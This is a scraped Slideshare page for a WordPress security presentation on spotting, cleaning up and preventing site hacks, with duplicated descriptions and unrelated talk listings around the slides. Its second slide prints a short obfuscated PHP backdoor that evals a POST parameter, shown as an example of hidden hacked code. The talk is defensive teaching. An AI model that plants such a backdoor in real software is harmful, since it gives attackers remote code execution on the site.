Presented at WordCamp Malaysia 2010.
Slideshare also does not resize my cropped images properly, thus resulting in squished images. This is noticeable on my squished code.
Common sense, simple security for WordPress. Many presentations have lots of complicated .htaccess tricks, moving/hiding files, etc. However, if people are overwhelmed with details, they tend to not do anything. If I were to summarize what you MUST do for security, I'd say:
1 - BACKUP - find a backup tool and use it. Subscribe to VaultPress.com or host your site with WPEngine.com or purchase BackupBuddy plugin and schedule regular backups. If you're short on cash, use BackWPUp plugin and download your wp-content folder.
2 - UPDATE - All plugins, themes, and WordPress at least once a month or whenever there is a security update. Sign up for an account at WordPress.org, so you'll get notices of WordPress security updates.
3 - DELETE -- All unused plugins and themes. These are your biggest security risks. Delete all unused copies of WordPress you might have installed on your server.
4 - BE CAUTIOUS - Don't use plugins willy nilly. Do some research. They are not all made the same, and they will leave you vulnerable to hacking.
5 - PASSWORDS -- Use strong, randomly generated passwords, all different, for everything - your hosting, ftp, WP login, and email. Use 1Password.com to track your passwords easily and securely.
6 - SECURITY PLUGINS -- Run Firewall 2 and Limit Login Attempts. There are others, but I don't know how well they play with others and what things they modify. You can check out Bulletproof Security and Better WP Security.
7 - BEST PRACTICES - See the slideshow for some other best practices regarding users, comments, etc.
If you just do the above 6 things systematically, you'll be far ahead of your peers! Good luck!
A presentation on the security vulnerabilities of WordPress environments, along with information on how to recover from a hack and tips for securing your site.
Presented at WordCamp Malaysia 2010.
Slideshare also does not resize my cropped images properly, thus resulting in squished images. This is noticeable on my squished code.
Common sense, simple security for WordPress. Many presentations have lots of complicated .htaccess tricks, moving/hiding files, etc. However, if people are overwhelmed with details, they tend to not do anything. If I were to summarize what you MUST do for security, I'd say:
1 - BACKUP - find a backup tool and use it. Subscribe to VaultPress.com or host your site with WPEngine.com or purchase BackupBuddy plugin and schedule regular backups. If you're short on cash, use BackWPUp plugin and download your wp-content folder.
2 - UPDATE - All plugins, themes, and WordPress at least once a month or whenever there is a security update. Sign up for an account at WordPress.org, so you'll get notices of WordPress security updates.
3 - DELETE -- All unused plugins and themes. These are your biggest security risks. Delete all unused copies of WordPress you might have installed on your server.
4 - BE CAUTIOUS - Don't use plugins willy nilly. Do some research. They are not all made the same, and they will leave you vulnerable to hacking.
5 - PASSWORDS -- Use strong, randomly generated passwords, all different, for everything - your hosting, ftp, WP login, and email. Use 1Password.com to track your passwords easily and securely.
6 - SECURITY PLUGINS -- Run Firewall 2 and Limit Login Attempts. There are others, but I don't know how well they play with others and what things they modify. You can check out Bulletproof Security and Better WP Security.
7 - BEST PRACTICES - See the slideshow for some other best practices regarding users, comments, etc.
If you just do the above 6 things systematically, you'll be far ahead of your peers! Good luck!
A presentation on the security vulnerabilities of WordPress environments, along with information on how to recover from a hack and tips for securing your site.
Brad Williams, the co-author of Professional WordPress Plugin Development, gives his presentation on Intro to WordPress Plugin Development to the NYC WordPress Meetup group in March 2011.
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
Website compromises can happen to any CMS and fixing them can be a daunting task.
Sucuri Remediation Team Lead, Ben Martin provided in this webinar a step by step guide to fixing your hacked Joomla! site.
This webinar is helpful if your website becomes compromised minimizing the attack time and stress.
Video here: https://youtu.be/3BEUQ0X9IBo
WordPress is the most popular Blogging platform now a days. Many high profile companies are using WordPress as there Blogging platform. Have you ever thought about the security of your blog running WordPress ?? This presentation was presented On 13th Feb 2010, At Nagpur PHP Meetup by me.
Presentation on WordPress security, which looks at why WordPress sites get hacked, how they get hacked, what to do to reduce your risk and how to recover your site after it has been hacked, or infected with malware.
5 Things You Shouldn't Do With A WordPress PluginKelly Phillips
This presentation is meant to help you implement some common WordPress functionality in a manual way instead of using plugins. This keeps your valuable plugin juice free for the plugins that are more complicated.
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014Bastian Grimm
My talk at #SEOZone 2014 in Istanbul covering various aspects of crawl space optimization such as crawler control & indexation strategies as well as site speed.
Learn how to keep your WordPress-powered website secure from hackers and exploits. Brad Williams from WebDevStudios.com shows examples of hacked sites, shares tips and plugins for keeping WordPress secure, and talks about his experiences with WordPress and security.
WordPress itself is pretty secure. To secure your WordPress site, you need to look at the bigger security picture.
In this presentation, I give a rundown of many of the other pieces of the application stack that WordPress relies on, the various vectors that attackers can use, what what kinds of things you can do to help protect your site.
Download the original Keynote file for my presenter's notes with more details.
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes.
Contains various tips and recommendations for off-the-shelf plugins to mitigate common security threats,
Presented on Sunday 6th November at WordCamp Gold Coast 2011.
Brad Williams, the co-author of Professional WordPress Plugin Development, gives his presentation on Intro to WordPress Plugin Development to the NYC WordPress Meetup group in March 2011.
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
Website compromises can happen to any CMS and fixing them can be a daunting task.
Sucuri Remediation Team Lead, Ben Martin provided in this webinar a step by step guide to fixing your hacked Joomla! site.
This webinar is helpful if your website becomes compromised minimizing the attack time and stress.
Video here: https://youtu.be/3BEUQ0X9IBo
WordPress is the most popular Blogging platform now a days. Many high profile companies are using WordPress as there Blogging platform. Have you ever thought about the security of your blog running WordPress ?? This presentation was presented On 13th Feb 2010, At Nagpur PHP Meetup by me.
Presentation on WordPress security, which looks at why WordPress sites get hacked, how they get hacked, what to do to reduce your risk and how to recover your site after it has been hacked, or infected with malware.
5 Things You Shouldn't Do With A WordPress PluginKelly Phillips
This presentation is meant to help you implement some common WordPress functionality in a manual way instead of using plugins. This keeps your valuable plugin juice free for the plugins that are more complicated.
Technical SEO: Crawl Space Management - SEOZone Istanbul 2014Bastian Grimm
My talk at #SEOZone 2014 in Istanbul covering various aspects of crawl space optimization such as crawler control & indexation strategies as well as site speed.
Learn how to keep your WordPress-powered website secure from hackers and exploits. Brad Williams from WebDevStudios.com shows examples of hacked sites, shares tips and plugins for keeping WordPress secure, and talks about his experiences with WordPress and security.
WordPress itself is pretty secure. To secure your WordPress site, you need to look at the bigger security picture.
In this presentation, I give a rundown of many of the other pieces of the application stack that WordPress relies on, the various vectors that attackers can use, what what kinds of things you can do to help protect your site.
Download the original Keynote file for my presenter's notes with more details.
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes.
Contains various tips and recommendations for off-the-shelf plugins to mitigate common security threats,
Presented on Sunday 6th November at WordCamp Gold Coast 2011.
Securing Your WordPress Website by Vlad Laskywordcampgc
Vlad is a computer systems engineer with a humorous and educational story to tell about WordPress security. This presentation gives every WordPress site administrator tips on how to harden their site against would-be attackers and avoid inadvertently doing things that could compromise site security.
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Bastian Grimm
My talk at #SAScon Manchester 2013 about WordPress security and how to make your WordPress (a bit) safer. Including two factor authentification, a lot of security specific settings and much more :)
Protect Your WordPress From The Inside OutSiteGround.com
The recent spike of hack attempts on various WordPress sites has made it more urgent than ever to take actions and secure your WordPress in the best possible way. In this webinar the WebDevStudios founders show the best practices and share insightful tricks how to protect your WordPress from getting hacked:
- WordPress Security Threats & Trends
- WordPress Admin Security Settings
- Securing Files, Folders & Databases
- Bullet Proof Passwords
- Vulnerable WordPress Extensions
- Recommended Plugins & Services
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertChetan Soni
You have been busy building your website, writing great content, touching people’s life, trying to make money online with your blog and you woke up to find out that your wordpress website has been hacked! And off course, your only option is to search Google for solution.
Presentation given at the WP Jyväksylä Meetup March 21st, 2017. This revised version contains references to the WordPress security news that circulated in February 2017.
Similar to Your WordPress Site is and is not Hacked - You don't know until you check (20)
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
20 Comprehensive Checklist of Designing and Developing a WebsitePixlogix Infotech
Dive into the world of Website Designing and Developing with Pixlogix! Looking to create a stunning online presence? Look no further! Our comprehensive checklist covers everything you need to know to craft a website that stands out. From user-friendly design to seamless functionality, we've got you covered. Don't miss out on this invaluable resource! Check out our checklist now at Pixlogix and start your journey towards a captivating online presence today.
Building RAG with self-deployed Milvus vector database and Snowpark Container...Zilliz
This talk will give hands-on advice on building RAG applications with an open-source Milvus database deployed as a docker container. We will also introduce the integration of Milvus with Snowpark Container Services.
Full-RAG: A modern architecture for hyper-personalizationZilliz
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionAggregage
Join Maher Hanafi, VP of Engineering at Betterworks, in this new session where he'll share a practical framework to transform Gen AI prototypes into impactful products! He'll delve into the complexities of data collection and management, model selection and optimization, and ensuring security, scalability, and responsible use.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
2. SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not
hacked until you open the box and find out.
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].
$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($
{$s20}['q53b3a6']);}?>
3. WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 —Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
5. WHY DO HACKERS HACK?
Deface sites for fun
Add spammy links to bad web
neighborhoods (SEO spam)
Hijack site to add spam, porn,
gambling, pay-day loans content
Steal sensitive information to sell
Distribute malware to personal
computers
Use server resources for
distributed attacks
6. WHAT DO HACKERS
ACTUALLY DO?
Create admin account
Reset passwords
Inject malicious code into content
Add malicious code to existing files
or new files
Redirect your website
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
Gravity Forms hack
7. WHY SHOULD YOU CARE?
Performance issues
SEO tanks
Blacklisting or Phish Tank
Account closed
Angry customers
8. TYPICALLY, ONLY THE
MOST SEVERELY HACKED
SITES WILL BE
BLACKLISTED OR
SUSPENDED BY HOST
Many hacks are hidden
10. RECENT VULNERABILITIES
Google Analytics WordPress 4.2.1
Backup to Dropbox FancyBox
TwentyFifteen
Revolution SliderGravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
11. LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don’t update, use weak
passwords, install tons of plugins, use not-great web hosting
13. “SPOT THE HACK” GAME
A - Scan Site
B - Look at files on server
C - Find the hacked code
A
B
C
14. 1 - Backdoors
PHP files uploaded to your server and accessed remotely. Severely
affect site and server performance. Not easy to find.
15. IT'S VERY COMMON, THAT
BACKDOORS DON'T HAVE
ANY VISIBLE SIGNS IN THE
SITE CODE AND IT'S
IMPOSSIBLE TO DETECT
THEM BY ACCESSING THE
INFECTED SITE FROM
OUTSIDE. ~ SUCURI
16. 2 - Drive by Downloads
Script injected on website generates links to malware sites or
downloads malware from your site to visitors’ computers.
Easy for scanners to detect.
17. 3 - Pharma Hack
Spam links injected onto web pages only visible to search
engines. Difficult to scan for because cloaked.
https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
18. 4 - Malicious Redirects
Redirects traffic from your website to another typically by
modifying the .htaccess file, sometimes only when viewed by a
particular device or browser, like a phone
Hacked .htaccess file
19. DIY HACK RECOVERY
Via SFTP (preferred) or FTP
1 Backup:
Download
everything. Good to
examine later for
details of hack if
needed.
2 Delete
all except:
cgi-bin
.htaccess
wp-config.php
(examine these)
3 Upload fresh:
WordPress
Themes
Plugins
cleaned uploads
20. Why are people from
Thailand and Romania
accessing a strangely
named PHP file
somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
MONITORING TIPS
21. Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
22. Check WordPress core integrity
using Sucuri plugin https://
wordpress.org/plugins/sucuri-
scanner/
Run https://wordpress.org/
plugins/gotmls/ to check
wp-content folder
Look for modified dates,
unusual names, file types
that don’t belong
Compare file list to original
download
Commonly hacked files: .htaccess,
wp-config.php, index.php,
functions.php, header.php
Any file can be hacked!
Finding PHP Back Doors
Hmmmm? PHP in a CSS folder?
23. Finding and Removing Malicious Redirects
Listen to when someone tells you that they tried to
visit your site and couldn’t and find out which browser
or device they were using at the time.
Use http://www.botsvsbrowsers.com/
SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck
Check all the .htaccess files on the server and remove
the redirect.
https://sitecheck.sucuri.net/
24. Use Google Search Console!
Google Webmaster Tools/Search Console
Search Queries – you can spot queries irrelevant to you site.
Links toYour Site – you can find suspicious incoming links here.
Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
25. Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
26. IMMEDIATELY CHANGE
PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress
users, FTP, web hosting, control panel
Scan computer for viruses!
27. See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access to site or database,
you might have to nuke the entire site from orbit
— it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact
sucuri.net for
site clean up and
monitoring
28. REQUEST SITE REVIEW
If Google blacklisted your site or marked it for phishing
scam, you will need to request a review after you are
certain you’ve cleaned up all hacked files:
https://support.google.com/webmasters/answer/
168328?hl=en
30. UPDATE UPDATE UPDATE
Timely updates are critical for security.
Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
31. SECURE YOUR LOGIN
Online Generator:
http://www.pctools.com/guides/password/
Track Passwords:
http://agilebits.com/products/1Password
Enable Two-Factor Authentication:
http://askwpgirl.com/wordpress-two-factor-
authentication-plugins/
Avoid logging in on
public WiFi Networks
32. RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam
filtering (Akismet plugin)
33. GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress Hosts:
Site Ground
WP Engine
Get Flywheel
Web Synthesis
Pantheon
34. EFFECTIVE SECURITY
PLUGIN FEATURES
Limit login access
Block bad URL requests
with a Firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the
foundation of aWordPress security policy
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/
Does all the above and more.Will notify you of vulnerable plugins.
35. BACKUPS
Common wisdom is to backup your site
Backups are to your site what major medical health
care coverage is to your health
Usually only helpful in case of a disaster
Services:
VaultPress and
WorpDrive good
hosted solutions!
Plugins:
BackupBuddy (paid),
BackWPUp,
Duplicator